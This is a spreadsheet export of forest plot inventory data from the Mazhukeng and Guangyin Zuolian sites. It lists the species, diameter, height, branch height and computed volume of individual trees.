Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	11	7.5	0.0572666
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	11	5.5	0.115637
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	11	3.2	0.159614
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	19	11	6.5	0.159614
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	22	11	7	0.210128
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	12	7	0.125984
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	12	2	0.157128
Mazhukeng	1	P035	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	21	12	7.5	0.209803
Mazhukeng	1	P035	Escalloniaceae	Itea	Itea chinensis Hook. et Arn.	ITECHI	1	1.5	1.3	8.96359e-05
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	1.5	3	2.5	0.000379528
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	3.5	2.5	0.000757716
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	4	1.8	0.000864223
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2	4	1.6	0.000864223
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	3	4	2.5	0.00184878
Mazhukeng	1	P035	Rubiaceae	Adina	Adina pilulifera (Lam.) Fr.	ADIPIL	2.5	4.5	2.2	0.0014749
Mazhukeng	1	P035	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	5	8.5	5.5	0.0101251
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3.5	6	1.8	0.00368033
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	4	6	3	0.00472771
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	7	6.5	1.9	0.0146119
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	2	0.00836267
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	5	7	2.5	0.00836267
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	17	7.5	1.9	0.0888478
Mazhukeng	1	P035	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	14	9	3.5	0.0738742
Mazhukeng	1	P035	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	2	5	4.5	0.00107666
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	1.6	0.6	0.000350486
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	1.8	1	0.000107269
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	2	1.7	0.000118999
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	2	1.7	0.000118999
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2.8	0.5	0.000354594
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2.8	1.8	0.000354594
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1.5	2.8	1.8	0.000354594
Mazhukeng	1	P035	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	2.8	2	0.00060821
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	2	0.00014825
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	2.5	0.8	0.00014825
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	1.5	0.000989284
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3	1	0.000989284
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	2	0.0013926
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.8	0.000757716
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1	0.000757716
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2.5	3.5	2	0.00115149
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	3.5	1.6	0.00278028
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4	1.5	0.000235529
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	1.5	0.00317108
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4	2.5	0.00317108
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	4.5	1.2	0.000264501
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	4	4.5	1.5	0.00356116
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	5	2	0.00107666
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	5	2	0.00230323
Mazhukeng	1	P036	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	6	1.6	0.00275631
Mazhukeng	1	P036	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	15	14	6	0.129924
Mazhukeng	1	P036	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	20	14	6	0.222849
Mazhukeng	1	P036	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	21	14	6.5	0.244203
Mazhukeng	1	P036	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1	1.5	0.8	8.96359e-05
Mazhukeng	1	P036	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	1.5	2.5	1.5	0.000317142
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	2.5	3.5	2.5	0.00115149
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	2	4	3	0.000864223
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	2.5	4	3	0.00131335
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	3	4	3	0.00184878
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	2.5	4.5	3.5	0.0014749
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	2.5	4.5	3.5	0.0014749
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	4	4.5	3	0.00356116
Mazhukeng	1	P036	Oleaceae	Fraxinus	Fraxinus insularis Hemsl.	FRAINS	3	5	4	0.00230323
Mazhukeng	1	P036	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	8	4.5	2.5	0.0130669
Mazhukeng	1	P036	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	13	4.5	1	0.0324809
Mazhukeng	1	P036	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6.5	2.5	0.0109433
Mazhukeng	1	P036	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	2	1.5	0.000118999
Mazhukeng	1	P036	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	2.5	2.5	2	0.000826667
Mazhukeng	1	P036	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	2	0.000235529
Mazhukeng	1	P036	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	8	8	6.5	0.0230299
Mazhukeng	1	P036	Anacardiaceae	Choerospondias	Choerospondias axillaris (Roxb.) Burtt et Hill	CHOAXI	11	8	6	0.0418484
Mazhukeng	1	P036	Aquifoliaceae	Ilex	Ilex rotunda Thuunb.	ILEROT	1	2	0.5	0.000118999
Mazhukeng	1	P036	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	1	1	0.5	6.01228e-05
Mazhukeng	1	P036	Araliaceae	Schefflera	Schefflera octophylla (Lour.) Harms	SCHOCT	3.5	4	2.5	0.00246856
Mazhukeng	1	P036	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	1.5	1	8.96359e-05
Mazhukeng	1	P036	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	1	1.5	0.2	8.96359e-05
Mazhukeng	1	P036	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2	1.8	0.3	0.000393599
Mazhukeng	1	P036	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	2.5	2.5	1.1	0.000826667
Mazhukeng	1	P036	Theaceae	Camellia	Camellia oleifera Abel.	CAMOLE	5.5	4	0.6	0.00576228
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.3	0.000177413
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1	3	0.5	0.000177413
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3	1.2	0.000650978
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	3	3	1	0.0013926
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	3.5	1.5	0.000757716
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	0.6	0.000503852
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	1.5	4	1	0.000503852
Mazhukeng	1	P037	Lauraceae	Litsea	Litsea rotundifolia var. oblongifolia (Nees) Allen	LITROT	2	4	2	0.000864223
Mazhukeng	1	P037	Rosaceae	Rhaphiolepis	Rhaphiolepis indica Lindl	RHAIND	1	2.5	1.8	0.00014825
Mazhukeng	1	P037	Flacourtiaceae	Scolopia	Scolopia saeva	SCOSAE	6	6	1.5	0.0101137
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	8	7	3	0.0201917
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	10	10	9	0.0436013
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	9	11	7	0.0393053
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	14	11	5	0.0900186
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	15	11	5	0.102454
Mazhukeng	1	P037	Lauraceae	Cinnamomum	Cinnamomum porrectum (Roxb.) Kost. [C. parthenoxylum Nees]	CINPOR	18	12	6	0.157128
Mazhukeng	1	P037	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	2	0.6	0.00043664
Mazhukeng	1	P037	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	6	3	0.4	0.00510984
Mazhukeng	1	P037	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	3	0.000235529
Mazhukeng	1	P037	Aquifoliaceae	Ilex	Ilex pubescens Hook. et Arn.	ILEPUB	1	4	2	0.000235529
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	3	1.2	0.000650978
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	3.5	2.5	0.000757716
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	6	2	0.00718464
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	6	0.0230299
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	7	0.0393034
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	9	6	0.0393034
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	16	9	7	0.094898
Mazhukeng	1	P037	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	10	6	0.131299
[truncated: 2,371 more rows]

## Sheet: Guangyin Zuolian
Site	Stand	Plot	Family	Genus	Species	SpCode	DBH/cm	Height/m	Branch.h/m	Volume/m3
Guangyin Zuolian	2	P101	Papilionaceae	Mucuna	Mucuna sempervirens	MUCSEM	5	6	4	0.00718464
Guangyin Zuolian	2	P101	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3	2.5	0.000650978
Guangyin Zuolian	2	P101	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	3.5	3	0.000757716
Guangyin Zuolian	2	P101	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4	3	0.00184878
Guangyin Zuolian	2	P101	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	6	4	3	0.0067837
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	3	2	0.000650978
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4	3	0.00184878
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4	3	0.00184878
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	4	3.5	0.00481906
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4.5	3.5	0.0020762
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	5	3	0.00230323
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5	3	0.00395057
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5	3	0.00395057
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4.5	5	4	0.00492716
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	5	4	0.00845122
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	5	3	0.00845122
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5.5	4	0.00433941
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	5.5	4	0.00928302
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	10	6.5	5	0.028525
Guangyin Zuolian	2	P101	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	11	10	8	0.0521352
Guangyin Zuolian	2	P101	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	2	3.5	3	0.000757716
Guangyin Zuolian	2	P101	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	6	5	0.0216356
Guangyin Zuolian	2	P101	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	6	5	0.0216356
Guangyin Zuolian	2	P101	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	6	5	0.0216356
Guangyin Zuolian	2	P101	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	4	2.5	2	0.00199599
Guangyin Zuolian	2	P101	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	3	5	4	0.00230323
Guangyin Zuolian	2	P101	Rutaceae	Evodia	Evodia meliaefolia Benth.	EVOMEL	17	9	6.5	0.106325
Guangyin Zuolian	2	P101	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	2.5	2	0.00014825
Guangyin Zuolian	2	P101	Myrsinaceae	Ardisia	Ardisia quinquegona Bl.	ARDQUI	1	3	2	0.000177413
Guangyin Zuolian	2	P101	Euphorbiaceae	Croton	Croton lachnocarpus Benth.	CROLAC	6	4	3	0.0067837
Guangyin Zuolian	2	P101	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	11	11	7	0.0572666
Guangyin Zuolian	2	P101	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	13	11	7	0.0783376
Guangyin Zuolian	2	P101	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	18	11	7	0.144222
Guangyin Zuolian	2	P101	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	11	7	0.228397
Guangyin Zuolian	2	P101	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	25	11	6	0.267058
Guangyin Zuolian	2	P101	Myrtaceae	Syzygium	Syzygium jambos (L.) Alston	SYZJAM	2	2.5	1	0.000543971
Guangyin Zuolian	2	P101	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	4	4	3	0.00317108
Guangyin Zuolian	2	P101	Papilionaceae	Dalbergia	Dalbergia hancei Benth.	DALHAN	3	5	4.5	0.00230323
Guangyin Zuolian	2	P101	Lauraceae	Cinnamomum	Cinnamomum burmanii (C. G. et Th.Nees) Bl.	CINBUR	4	4	2.5	0.00317108
Guangyin Zuolian	2	P101	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	8	6	3	0.0173473
Guangyin Zuolian	2	P102	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	2	2.5	1.3	0.000543971
Guangyin Zuolian	2	P102	Myrtaceae	Syzygium	Syzygium rehderianum Merr. et Perry	SYZREH	3	4	1.4	0.00184878
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	4	3	0.00184878
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5	4	0.00395057
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	5	4	0.00600364
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	5.5	5	0.00433941
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	5.5	1.8	0.012395
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	2	6	2	0.00128845
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	3	6	3	0.00275631
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	6	1.7	0.0101137
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	6	4.5	0.0101137
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	4	6.5	2.5	0.00511552
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	7	4	0.011772
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	9	7.5	5	0.0269539
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	8	3.5	0.0179278
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	8	6	0.0230299
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	8	9	6	0.0258628
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	7	10	6	0.0223347
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	15	11.5	6	0.107039
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	7	3	0.011772
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	2.5	0.0179278
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	5	0.0179278
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	7	8	3.5	0.0179278
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	5.5	0.0230299
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	9	8	3.5	0.0287229
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8.5	5	0.024447
Guangyin Zuolian	2	P102	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	10	9.5	4	0.0414532
Guangyin Zuolian	2	P102	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	5	5.5	2	0.00659455
Guangyin Zuolian	2	P102	Rutaceae	Zanthoxylum	Zanthoxylum avicennae	ZANAVI	6	6.5	4	0.0109433
Guangyin Zuolian	2	P102	Mimosaceae	Pithecellobium	Pithecellobium lucidum Benth.	PITLUC	5	4	1.6	0.00481906
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	9	1.1	6	0.00406903
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	3.5	1.6	0.00422516
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	2	4	3	0.000864223
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	5.5	2	0.00433941
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	7	2.5	0.00550289
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	3.5	0.00836267
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7.5	4	0.00895072
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	6	7.5	4	0.0125998
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	6	0.0230299
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	12	10	6	0.0613767
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	6	0.0900186
Guangyin Zuolian	2	P102	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	17	11	7	0.129562
Guangyin Zuolian	2	P102	Lauraceae	Machilus	Machilus pauhoi Kanehira	MACPAU	10	8.5	6	0.0371518
Guangyin Zuolian	2	P102	Rutaceae	Evodia	Evodia lepta (Spreng.) Merr.	EVOLEP	3	3.5	2	0.00162093
Guangyin Zuolian	2	P102	Proteaceae	Helicia	Helicia reticulata W. T. Wang	HELRET	2	3	2.5	0.000650978
Guangyin Zuolian	2	P102	Proteaceae	Helicia	Helicia reticulata W. T. Wang	HELRET	4	4.5	2	0.00356116
Guangyin Zuolian	2	P102	Euphorbiaceae	Aporosa	Aporosa dioica (Roxb.) Muell.-Arg. [A. chinensis (Champ.) Merr.]	APODIO	3	4	2.5	0.00184878
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	2	4	3	0.000864223
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	3	5	4	0.00230323
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	5	6.5	4	0.007774
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	8	6.5	4	0.0187703
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	10	7.5	2.5	0.0328428
Guangyin Zuolian	2	P102	Rubiaceae	Canthium	Canthium dicoccum (Gaertn.) Merr.	CANDIC	20	9	4	0.144215
Guangyin Zuolian	2	P103	Euphorbiaceae	Mallotus	Mallotus paniculatus (Lam.) Muell.-Arg.	MALPAN	11	5.5	1.9	0.0289334
Guangyin Zuolian	2	P103	Tiliaceae	Microcos	Microcos paniculata L.	MICPAN	9	7	4.5	0.0251831
Guangyin Zuolian	2	P103	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	5	6.5	4	0.007774
Guangyin Zuolian	2	P103	Lauraceae	Machilus	Machilus chinensis (Champ. ex Benth.) Hemsl.	MACCHI	6	8	1.5	0.0134267
Guangyin Zuolian	2	P103	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	3	5	2.5	0.00230323
Guangyin Zuolian	2	P103	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	6	6	3.5	0.0101137
Guangyin Zuolian	2	P103	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	12	6	3	0.03711
Guangyin Zuolian	2	P103	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	4	7	3	0.00550289
Guangyin Zuolian	2	P103	Rutaceae	Acronychia	Acronychia pedunculata (L.) Miq.	ACRPED	8	8	4	0.0230299
Guangyin Zuolian	2	P103	Rubiaceae	Psychotria	Psychotria rubra (Lour.) Poir.	PSYRUB	2	3	0.4	0.000650978
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	6	3.5	0.00472771
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	4	6	4	0.00472771
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	5	7	3	0.00836267
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	8	8	3.7	0.0230299
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	10	10	7	0.0436013
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	14	11	6	0.0900186
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	11	2	0.175732
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	20	12	6	0.191457
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	13	2.5	0.269246
Guangyin Zuolian	2	P103	Theaceae	Schima	Schima superba Gardn. et Champ.	SCHSUP	23	13	7	0.269246
